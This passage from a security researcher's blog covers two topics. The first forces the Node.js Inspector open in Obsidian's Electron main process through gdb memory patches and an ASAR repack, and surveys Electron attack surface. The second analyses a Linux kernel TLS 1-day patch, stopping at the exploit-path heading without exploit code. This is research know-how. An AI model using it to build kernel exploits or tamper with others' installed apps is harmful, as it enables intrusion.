<p>If we map its role onto the gdb toolchain, the Inspector is more like <code class="language-plaintext highlighter-rouge">gdbserver</code>, allowing us to attach to and debug a running renderer. A process that is not a renderer can also implement the Inspector protocol to support debugging, and this is exactly what Electron’s Node.js process does. The inspector is not enabled by default, but in most cases you only need to pass <a href="https://www.electronjs.org/docs/latest/tutorial/debugging-main-process">additional parameters</a> to the application to enable it. For example:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># expose inspector port at 9229 (default port)</span>
app <span class="nt">--inspect</span><span class="o">=</span>9229

<span class="c"># break at the first line of code</span>
app <span class="nt">--inspect-brk</span>
</code></pre></div></div>

<p>After that, you can open <code class="language-plaintext highlighter-rouge">chrome://inspect</code> in Chrome and debug the Node.js process.</p>

<p><img src="/assets/image-20260118122235921.png" alt="image-20260118122235921" style="display: block; margin-left: auto; margin-right: auto;" /></p>

<p>However, when I run <code class="language-plaintext highlighter-rouge">obsidian --inspect</code> or similar commands, no inspector is launched. After some investigation, I suspected that Obsidian had either modified the Node.js code or set some options (I’m not sure which) to disable the Inspector.</p>

<p>I then opened IDA to reverse the Obsidian ELF. By searching for <code class="language-plaintext highlighter-rouge">"--inspect"</code>, I found that <code class="language-plaintext highlighter-rouge">node::options_parser::DebugOptionsParser::DebugOptionsParser()</code> is responsible for parsing debug-related parameters. Mapping the function to the <a href="https://github.com/nodejs/node/blob/9bcfbeb236307c5a9cc558477598b4338ed398b6/src/node_options.cc#L433">Node.js source code</a> confirms that it parses debug arguments, including <code class="language-plaintext highlighter-rouge">--inspect</code>.</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">DebugOptionsParser</span><span class="o">::</span><span class="n">DebugOptionsParser</span><span class="p">()</span> <span class="p">{</span>
  <span class="c1">// [...]</span>
  <span class="n">AddOption</span><span class="p">(</span><span class="s">"--inspect"</span><span class="p">,</span>
            <span class="s">"activate inspector on host:port (default: 127.0.0.1:9229)"</span><span class="p">,</span>
            <span class="o">&amp;</span><span class="n">DebugOptions</span><span class="o">::</span><span class="n">inspector_enabled</span><span class="p">,</span> <span class="c1">// offset: 9</span>
            <span class="n">kAllowedInEnvvar</span><span class="p">);</span>
  <span class="n">AddAlias</span><span class="p">(</span><span class="s">"--inspect="</span><span class="p">,</span> <span class="p">{</span> <span class="s">"--inspect-port"</span><span class="p">,</span> <span class="s">"--inspect"</span> <span class="p">});</span>
  <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>But if you set a breakpoint at <code class="language-plaintext highlighter-rouge">DebugOptions::CheckOptions()</code> and inspect <code class="language-plaintext highlighter-rouge">argv</code>, you will find that <strong><code class="language-plaintext highlighter-rouge">--inspect</code> is missing, which means the flag is dropped before it ever reaches the Node.js option parser!</strong></p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="n">DebugOptions</span><span class="o">::</span><span class="n">CheckOptions</span><span class="p">(</span><span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o">&lt;</span><span class="n">std</span><span class="o">::</span><span class="n">string</span><span class="o">&gt;*</span> <span class="n">errors</span><span class="p">,</span>
                                <span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o">&lt;</span><span class="n">std</span><span class="o">::</span><span class="n">string</span><span class="o">&gt;*</span> <span class="n">argv</span><span class="p">)</span> <span class="p">{</span>
  <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>One possible solution is a runtime patch. You can break at <code class="language-plaintext highlighter-rouge">node::inspector::Agent::Start()</code>, which determines whether the Inspector should be started. One of the conditions it checks is that the <code class="language-plaintext highlighter-rouge">options.inspector_enabled</code> flag <a href="https://github.com/nodejs/node/blob/9bcfbeb236307c5a9cc558477598b4338ed398b6/src/inspector_agent.cc#L864">must be true</a>. This is the same flag that <code class="language-plaintext highlighter-rouge">--inspect</code> is supposed to set. Here, we can simply set it to <code class="language-plaintext highlighter-rouge">true</code> manually and then continue execution – the Inspector will start successfully!</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">bool</span> <span class="n">Agent</span><span class="o">::</span><span class="n">Start</span><span class="p">(</span><span class="k">const</span> <span class="n">std</span><span class="o">::</span><span class="n">string</span><span class="o">&amp;</span> <span class="n">path</span><span class="p">,</span>
                  <span class="k">const</span> <span class="n">DebugOptions</span><span class="o">&amp;</span> <span class="n">options</span><span class="p">,</span>
                  <span class="n">std</span><span class="o">::</span><span class="n">shared_ptr</span><span class="o">&lt;</span><span class="n">ExclusiveAccess</span><span class="o">&lt;</span><span class="n">HostPort</span><span class="o">&gt;&gt;</span> <span class="n">host_port</span><span class="p">,</span>
                  <span class="kt">bool</span> <span class="n">is_main</span><span class="p">)</span> <span class="p">{</span>
  <span class="c1">// [...]</span>
  <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">parent_handle_</span> <span class="o">&amp;&amp;</span>
      <span class="p">(</span><span class="o">!</span><span class="n">options</span><span class="p">.</span><span class="n">inspector_enabled</span> <span class="o">||</span> <span class="o">!</span><span class="n">options</span><span class="p">.</span><span class="n">allow_attaching_debugger</span> <span class="o">||</span>
       <span class="o">!</span><span class="n">StartIoThread</span><span class="p">()))</span> <span class="p">{</span>
    <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
  <span class="p">}</span>
  <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

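<p>These are the GDB commands I used. <code class="language-plaintext highlighter-rouge">Agent::Start()</code> is a non-static member function, so under the System V x86-64 calling convention <code class="language-plaintext highlighter-rouge">this</code> is passed in <code class="language-plaintext highlighter-rouge">rdi</code>, <code class="language-plaintext highlighter-rouge">path</code> in <code class="language-plaintext highlighter-rouge">rsi</code>, and the <code class="language-plaintext highlighter-rouge">options</code> reference in <code class="language-plaintext highlighter-rouge">rdx</code>; offset 9 is the position of <code class="language-plaintext highlighter-rouge">inspector_enabled</code> noted in the parser snippet above:</p>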

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>b Agent::Start
set follow-fork-mode parent
r
# hit the breakpoint
set *(char *)($rdx + 9)=1
</code></pre></div></div>

<p>Output:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>...
pwndbg&gt; set *(char *)($rdx + 9)=1
pwndbg&gt; c
Continuing.
[New Thread 0x76bd653f36c0 (LWP 44357)]
Debugger listening on ws://127.0.0.1:9229/6f96cdd8-bb69-4f55-b36f-bfffc2eb2ca8
For help, see: https://nodejs.org/en/docs/inspector
2026-01-18 05:27:15 Loading main app package /opt/Obsidian/resources/obsidian.asar
[New Thread 0x76bcd19ff6c0 (LWP 44358)]
...
</code></pre></div></div>
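
<p>If you want to script the attach step instead of opening <code class="language-plaintext highlighter-rouge">chrome://inspect</code> by hand, the WebSocket endpoint can be pulled out of that output. The following is a small sketch under my own assumptions: <code class="language-plaintext highlighter-rouge">parseInspectorEndpoint</code> is a hypothetical helper, and the pattern only covers the <code class="language-plaintext highlighter-rouge">ws://host:port/id</code> form shown above (not bracketed IPv6 hosts).</p>

```javascript
// Hypothetical helper: find the Inspector endpoint in the text printed by the process.
// Returns null when no "Debugger listening on ..." line is present.
function parseInspectorEndpoint(output) {
  const match = output.match(/Debugger listening on (ws:\/\/([^:\/\s]+):(\d+)\/(\S+))/);
  if (!match) return null;
  return {
    wsUrl: match[1],
    host: match[2],
    port: Number(match[3]),
    id: match[4],
  };
}

const log = [
  'Continuing.',
  'Debugger listening on ws://127.0.0.1:9229/6f96cdd8-bb69-4f55-b36f-bfffc2eb2ca8',
  'For help, see: https://nodejs.org/en/docs/inspector',
].join('\n');

console.log(parseInspectorEndpoint(log));
```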

<p>Great! We can now debug the main process!</p>

<p><img src="/assets/image-20260118133123479.png" alt="image-20260118133123479" style="display: block; margin-left: auto; margin-right: auto;" /></p>

<p>But what if we want to debug the initialization of the main script? Is there any way to pause the Node.js process right at startup? Going back to <code class="language-plaintext highlighter-rouge">DebugOptionsParser::DebugOptionsParser()</code>, we can see another parameter, <code class="language-plaintext highlighter-rouge">--inspect-brk</code>, which sets the <code class="language-plaintext highlighter-rouge">break_first_line</code> flag.</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">DebugOptionsParser</span><span class="o">::</span><span class="n">DebugOptionsParser</span><span class="p">()</span> <span class="p">{</span>
  <span class="c1">// [...]</span>
  <span class="n">AddOption</span><span class="p">(</span><span class="s">"--inspect-brk"</span><span class="p">,</span>
            <span class="s">"activate inspector on host:port and break at start of user script"</span><span class="p">,</span>
            <span class="o">&amp;</span><span class="n">DebugOptions</span><span class="o">::</span><span class="n">break_first_line</span><span class="p">,</span> <span class="c1">// offset: 12</span>
            <span class="n">kAllowedInEnvvar</span><span class="p">);</span>
  <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">break_first_line</code> flag is used in <a href="https://github.com/nodejs/node/blob/9bcfbeb236307c5a9cc558477598b4338ed398b6/src/inspector_agent.cc#L1189"><code class="language-plaintext highlighter-rouge">node::inspector::Agent::WaitForConnectByOptions()</code></a> to determine whether the Inspector should break at the first line and wait for the debugger to attach.</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">bool</span> <span class="n">Agent</span><span class="o">::</span><span class="n">WaitForConnectByOptions</span><span class="p">()</span> <span class="p">{</span>
  <span class="c1">// [...]</span>
  <span class="kt">bool</span> <span class="n">should_break_first_line</span> <span class="o">=</span> <span class="n">debug_options_</span><span class="p">.</span><span class="n">should_break_first_line</span><span class="p">();</span>
  <span class="c1">// [...]</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">wait_for_connect</span> <span class="o">||</span> <span class="n">should_break_first_line</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Patch the debug options to implement waitForDebuggerOnStart for</span>
    <span class="c1">// the NodeWorker.enable method.</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">should_break_first_line</span><span class="p">)</span> <span class="p">{</span>
      <span class="n">CHECK</span><span class="p">(</span><span class="o">!</span><span class="n">parent_env_</span><span class="o">-&gt;</span><span class="n">has_serialized_options</span><span class="p">());</span>
      <span class="n">debug_options_</span><span class="p">.</span><span class="n">EnableBreakFirstLine</span><span class="p">();</span>
      <span class="n">parent_env_</span><span class="o">-&gt;</span><span class="n">options</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">get_debug_options</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">EnableBreakFirstLine</span><span class="p">();</span>
    <span class="p">}</span>
    <span class="n">client_</span><span class="o">-&gt;</span><span class="n">waitForFrontend</span><span class="p">();</span>
    <span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
  <span class="p">}</span>
  <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>To enable it, we just need to run one additional GDB command:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>set *(char *)($rdx + 12)=1
</code></pre></div></div>

<p>Now the Inspector will pause execution and wait for us to attach the debugger!</p>

<p><img src="/assets/image-20260118134544951.png" alt="image-20260118134544951" style="display: block; margin-left: auto; margin-right: auto;" /></p>

<h3 id="322-static-patch">3.2.2. Static Patch</h3>

<p>When I was writing this post, I found an easier way to start the Inspector lol. Since we can repack the ASAR file, we just need to add the following two lines of JS code to <code class="language-plaintext highlighter-rouge">main.js</code>:</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">inspector</span><span class="dl">'</span><span class="p">).</span><span class="nx">open</span><span class="p">(</span><span class="mi">9229</span><span class="p">,</span> <span class="dl">'</span><span class="s1">127.0.0.1</span><span class="dl">'</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span>
<span class="k">debugger</span><span class="p">;</span>
</code></pre></div></div>

<p>Repacking ASAR files is straightforward:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">cd</span> /opt/Obsidian/resources
npx asar extract app.asar ~/Downloads/app.unpacked
<span class="c"># ... patch file</span>
npx asar pack ~/Downloads/app.unpacked app.asar
<span class="nb">cp </span>app.asar /opt/Obsidian/resources/app.asar
</code></pre></div></div>

<p>The Inspector will be launched as well.</p>

<p><img src="/assets/image-20260118140737247.png" alt="image-20260118140737247" style="display: block; margin-left: auto; margin-right: auto;" /></p>

<p>WOW, I feel like a stupid guy XD</p>

<h3 id="33-find-vulnerabilities">3.3. Find Vulnerabilities</h3>

<p>By searching for the string <code class="language-plaintext highlighter-rouge">"second-instance"</code> or <code class="language-plaintext highlighter-rouge">"open-url"</code>, you can easily locate the handler and start analyzing the minified JS code.</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// main.js (obsidian.asar)</span>
<span class="nx">i</span><span class="p">.</span><span class="nx">app</span><span class="p">.</span><span class="nx">whenReady</span><span class="p">().</span><span class="nx">then</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="nx">i</span><span class="p">.</span><span class="nx">app</span><span class="p">.</span><span class="nx">on</span><span class="p">(</span><span class="dl">"</span><span class="s2">second-instance</span><span class="dl">"</span><span class="p">,</span> <span class="p">(</span><span class="nx">e</span><span class="p">,</span> <span class="nx">t</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span>
        <span class="nx">Ve</span><span class="p">(</span><span class="nx">t</span><span class="p">)</span> <span class="o">||</span> <span class="nx">Z</span><span class="p">()</span>
    <span class="p">});</span>
    <span class="c1">// [...]</span>
<span class="p">})</span>

<span class="cm">/* ...*/</span> <span class="nx">i</span><span class="p">.</span><span class="nx">app</span><span class="p">.</span><span class="nx">on</span><span class="p">(</span><span class="dl">"</span><span class="s2">open-url</span><span class="dl">"</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">e</span><span class="p">,</span> <span class="nx">t</span><span class="p">)</span> <span class="p">{</span>
            <span class="nx">e</span><span class="p">.</span><span class="nx">preventDefault</span><span class="p">(),</span> <span class="nx">he</span><span class="p">(</span><span class="nx">t</span><span class="p">)</span>
         <span class="p">}),</span> <span class="cm">/* ... */</span>
<span class="c1">// [...]</span>
</code></pre></div></div>

<p>In fact, I don’t really have any experience finding protocol handler vulnerabilities, and I didn’t even find any web bugs, so… there aren’t that many things to share in this part :p. However, protocol handlers have been a widely known attack surface for a long time, and you can find plenty of resources discussing them. For example, Obsidian previously had <a href="https://forum.obsidian.md/t/possible-remote-code-execution-through-obsidian-uri-scheme/39743">a potential RCE vulnerability</a>, which was in the <code class="language-plaintext highlighter-rouge">hook-get-address</code> command handler.</p>

<p>If you can execute arbitrary JS code or HTML (via XSS, markdown features, …) in an Electron application, it may lead to unexpected problems. In the worst case, an attacker can call arbitrary Node.js APIs and run system commands. <a href="https://lsgeurope.com/post/0-click-rce-in-electron-applications">This post</a> explains several scenarios where unsafe Electron configurations can result in pretty bad problems.</p>

<p>There are three relatively important attributes in the Electron <code class="language-plaintext highlighter-rouge">webPreferences</code> configuration:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">nodeIntegration</code>: whether the renderer process can call Node.js APIs.</li>
  <li><code class="language-plaintext highlighter-rouge">sandbox</code>: whether the renderer process runs in an OS-level sandbox and can only access limited resources.</li>
  <li><code class="language-plaintext highlighter-rouge">contextIsolation</code>: whether the web page’s JS code is prevented from polluting the global JS environment, such as hijacking preloaded JS code.</li>
</ul>

<p>I drew a simple map to show where we should focus when looking at an Electron application:</p>

<p><img src="/assets/image-20260118215012083.png" alt="image-20260118215012083" style="display: block; margin-left: auto; margin-right: auto;" /></p>

<p>I’m working on it and hope to share something interesting in the future!</p>

<h2 id="4-conclusion">4. Conclusion</h2>

<p>I think writing blogs is still beneficial, not only for sharing technical ideas, but also for organizing what I’ve learned. Hope I can keep doing this throughout the year!</p>]]></content><author><name></name></author><category term="Web" /><summary type="html"><![CDATA[0. Murmur]]></summary></entry><entry><title type="html">Analyze Linux Kernel 1-day 0aeb54ac</title><link href="https://u1f383.github.io/linux/2025/10/03/analyze-linux-kernel-1-day-0aeb54ac.html" rel="alternate" type="text/html" title="Analyze Linux Kernel 1-day 0aeb54ac" /><published>2025-10-03T00:00:00+00:00</published><updated>2025-10-03T00:00:00+00:00</updated><id>https://u1f383.github.io/linux/2025/10/03/analyze-linux-kernel-1-day-0aeb54ac</id><content type="html" xml:base="https://u1f383.github.io/linux/2025/10/03/analyze-linux-kernel-1-day-0aeb54ac.html"><![CDATA[<p>One day, @farazsth98 asked me if I had analyzed the latest 1-day kernelCTF slot. I hadn’t analyzed it yet, but I thought it was a good time to do something interesting — especially since preparing a talk is exhausting 😭.</p>

<p>The vulnerability occurred in the TLS subsystem, and its <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0aeb54ac4cd5cf8f60131b4d9ec0b6dc9c27b20d">commit</a> revealed many details about the triggering scenario.</p>

<p>This post is just a quick note about my reproduction, so it helps if you already have some background knowledge of TLS before reading.</p>

<p>Some of my previous posts might also be useful:</p>

<ul>
  <li><a href="/linux/2025/01/20/linux-kernel-tls-part-1.html">Linux Kernel TLS Part 1</a></li>
  <li><a href="/linux/2025/01/21/linux-kernel-tls-part-2.html">Linux Kernel TLS Part 2</a></li>
  <li><a href="/linux/2025/09/03/analysis-of-CVE-2025-37756-an-uaf-vulnerability-in-linux-ktls.html">Analysis of CVE-2025-37756, an UAF Vulnerability in Linux KTLS</a></li>
</ul>

<h2 id="1-patch-analysis">1. Patch Analysis</h2>

<h3 id="11-key-problem">1.1. Key Problem</h3>

<p>The patch updates several files, but the core issue lies in <code class="language-plaintext highlighter-rouge">tls_rx_msg_size()</code>.</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">@@ -2474,8 +2474,7 @@</span> int tls_rx_msg_size(struct tls_strparser *strp, struct sk_buff *skb)
     return data_len + TLS_HEADER_SIZE;
 
 read_failure:
<span class="gd">-    tls_err_abort(strp-&gt;sk, ret);
-
</span><span class="gi">+    tls_strp_abort_strp(strp, ret);
</span>     return ret;
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">tls_rx_msg_size()</code> function is used to calculate the total TLS record size from the header [1]. Before the patch, if the size was too large [2] or too small [3], <code class="language-plaintext highlighter-rouge">tls_err_abort()</code> was called to set the socket error state [4].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">tls_rx_msg_size</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">data_len</span> <span class="o">=</span> <span class="p">((</span><span class="n">header</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mh">0xFF</span><span class="p">)</span> <span class="o">|</span> <span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">&lt;&lt;</span> <span class="mi">8</span><span class="p">));</span> <span class="c1">// [1]</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">data_len</span> <span class="o">&gt;</span> <span class="n">TLS_MAX_PAYLOAD_SIZE</span> <span class="cm">/* 0x4000 */</span> <span class="o">+</span> <span class="n">cipher_overhead</span> <span class="o">+</span> <span class="c1">// [2]</span>
        <span class="n">prot</span><span class="o">-&gt;</span><span class="n">tail_size</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="n">EMSGSIZE</span><span class="p">;</span>
        <span class="k">goto</span> <span class="n">read_failure</span><span class="p">;</span>
    <span class="p">}</span>
    
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">data_len</span> <span class="o">&lt;</span> <span class="n">cipher_overhead</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// [3]</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="n">EBADMSG</span><span class="p">;</span>
        <span class="k">goto</span> <span class="n">read_failure</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// [...]</span>
<span class="nl">read_failure:</span>
    <span class="n">tls_err_abort</span><span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">sk</span><span class="p">,</span> <span class="n">ret</span><span class="p">);</span>

    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="n">noinline</span> <span class="kt">void</span> <span class="nf">tls_err_abort</span><span class="p">(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="n">sk</span><span class="p">,</span> <span class="kt">int</span> <span class="n">err</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">WRITE_ONCE</span><span class="p">(</span><span class="n">sk</span><span class="o">-&gt;</span><span class="n">sk_err</span><span class="p">,</span> <span class="o">-</span><span class="n">err</span><span class="p">);</span> <span class="c1">// [4]</span>
    <span class="c1">// [...]</span>
    <span class="n">sk_error_report</span><span class="p">(</span><span class="n">sk</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
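
<p>To make the two length checks easier to follow, here is a minimal userspace sketch of the same arithmetic. It is not the kernel code: <code class="language-plaintext highlighter-rouge">sketch_record_size()</code> and the <code class="language-plaintext highlighter-rouge">SKETCH_*</code> constants are names I made up, and <code class="language-plaintext highlighter-rouge">cipher_overhead</code> and <code class="language-plaintext highlighter-rouge">tail_size</code> are plain parameters because the sketch has no <code class="language-plaintext highlighter-rouge">tls_prot_info</code>.</p>

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>

/* Illustrative constants for this sketch only. */
#define SKETCH_TLS_HEADER_SIZE      5
#define SKETCH_TLS_MAX_PAYLOAD_SIZE 0x4000

/*
 * Userspace model of the length checks in tls_rx_msg_size().
 * hdr points at the 5-byte TLS record header. cipher_overhead and
 * tail_size are assumptions passed in by the caller.
 * Returns the full record size, or a negative errno on a bad length.
 */
static int sketch_record_size(const unsigned char *hdr,
                              size_t cipher_overhead, size_t tail_size)
{
    size_t data_len;

    assert(hdr != NULL);

    /* Bytes 3 and 4 hold the big-endian payload length. */
    data_len = ((size_t)hdr[3] << 8) | hdr[4];

    /* Too large: longer than a maximum-size record can ever be. */
    if (data_len > SKETCH_TLS_MAX_PAYLOAD_SIZE + cipher_overhead + tail_size)
        return -EMSGSIZE;

    /* Too small: cannot even hold the cipher overhead. */
    if (data_len < cipher_overhead)
        return -EBADMSG;

    return (int)(data_len + SKETCH_TLS_HEADER_SIZE);
}
```

<p>With an assumed overhead of 16 bytes, a header announcing <code class="language-plaintext highlighter-rouge">0xffff</code> bytes takes the <code class="language-plaintext highlighter-rouge">-EMSGSIZE</code> branch and a header announcing 1 byte takes the <code class="language-plaintext highlighter-rouge">-EBADMSG</code> branch. In the kernel, both branches jump to <code class="language-plaintext highlighter-rouge">read_failure</code>.</p>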

<p>After the patch, the call to <code class="language-plaintext highlighter-rouge">tls_err_abort()</code> is replaced with <code class="language-plaintext highlighter-rouge">tls_strp_abort_strp()</code>.</p>

<p>Unlike <code class="language-plaintext highlighter-rouge">tls_err_abort()</code>, <code class="language-plaintext highlighter-rouge">tls_strp_abort_strp()</code> not only sets the socket error state, but also <strong>stops the TLS stream parser</strong> [5].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">tls_strp_abort_strp</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">,</span> <span class="kt">int</span> <span class="n">err</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">stopped</span><span class="p">)</span>
        <span class="k">return</span><span class="p">;</span>

    <span class="n">strp</span><span class="o">-&gt;</span><span class="n">stopped</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="c1">// [5]</span>
    <span class="c1">// [...]</span>
    <span class="n">WRITE_ONCE</span><span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">sk</span><span class="o">-&gt;</span><span class="n">sk_err</span><span class="p">,</span> <span class="o">-</span><span class="n">err</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">sk_error_report</span><span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">sk</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>If the <code class="language-plaintext highlighter-rouge">stopped</code> flag is set [6], the TLS packet receive callback <code class="language-plaintext highlighter-rouge">tls_strp_read_sock()</code> will no longer be invoked [7], effectively preventing the TLS parser from processing further packets.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">tls_strp_check_rcv</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">stopped</span><span class="p">)</span> <span class="cm">/* [6] */</span> <span class="o">||</span> <span class="n">strp</span><span class="o">-&gt;</span><span class="n">msg_ready</span><span class="p">)</span>
        <span class="k">return</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">tls_strp_read_sock</span><span class="p">(</span><span class="n">strp</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">)</span> <span class="c1">// [7]</span>
        <span class="n">queue_work</span><span class="p">(</span><span class="n">tls_strp_wq</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">work</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
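
<p>The difference between the two abort helpers can be modeled in a few lines. This is only a sketch under my own assumptions: <code class="language-plaintext highlighter-rouge">struct sketch_strp</code> and the <code class="language-plaintext highlighter-rouge">sketch_*</code> functions are hypothetical stand-ins, and the <code class="language-plaintext highlighter-rouge">reads</code> counter replaces the real call to <code class="language-plaintext highlighter-rouge">tls_strp_read_sock()</code>.</p>

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical stand-in for the parser state discussed above. */
struct sketch_strp {
    bool stopped;
    bool msg_ready;
    int  sk_err;   /* models sk->sk_err */
    int  reads;    /* counts how often the read callback would run */
};

/* Old behaviour: only record the error, the parser keeps running. */
static void sketch_err_abort(struct sketch_strp *s, int err)
{
    assert(s);
    s->sk_err = -err;
}

/* New behaviour: record the error and stop the parser, only once. */
static void sketch_abort_strp(struct sketch_strp *s, int err)
{
    assert(s);
    if (s->stopped)
        return;
    s->stopped = true;
    s->sk_err = -err;
}

/* Models tls_strp_check_rcv(): skip the read when stopped or ready. */
static void sketch_check_rcv(struct sketch_strp *s)
{
    assert(s);
    if (s->stopped || s->msg_ready)
        return;
    s->reads++;   /* the real code calls tls_strp_read_sock() here */
}
```

<p>In this model, <code class="language-plaintext highlighter-rouge">sketch_err_abort()</code> followed by two <code class="language-plaintext highlighter-rouge">sketch_check_rcv()</code> calls still bumps <code class="language-plaintext highlighter-rouge">reads</code> twice, while <code class="language-plaintext highlighter-rouge">sketch_abort_strp()</code> keeps it at zero.</p>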

<p>The only affected path is <code class="language-plaintext highlighter-rouge">tls_strp_copyin_frag()</code>. Since its call to <code class="language-plaintext highlighter-rouge">tls_rx_msg_size()</code> would previously return an error <strong>without setting the <code class="language-plaintext highlighter-rouge">stopped</code> flag</strong>, the function could be triggered repeatedly, leading to unintended side effects.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">tls_strp_copyin_frag</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span>
                <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">in_skb</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">offset</span><span class="p">,</span>
                <span class="kt">size_t</span> <span class="n">in_len</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">stm</span><span class="p">.</span><span class="n">full_len</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// [...]</span>
        <span class="n">sz</span> <span class="o">=</span> <span class="n">tls_rx_msg_size</span><span class="p">(</span><span class="n">strp</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">sz</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
            <span class="k">return</span> <span class="n">sz</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<h3 id="12-exploit-path">1.2. Exploit Path</h3>

<p>The patch also hardens the socket fragment handling in <code class="language-plaintext highlighter-rouge">tls_strp_copyin_frag()</code>, which closes the exploitation path.</p>

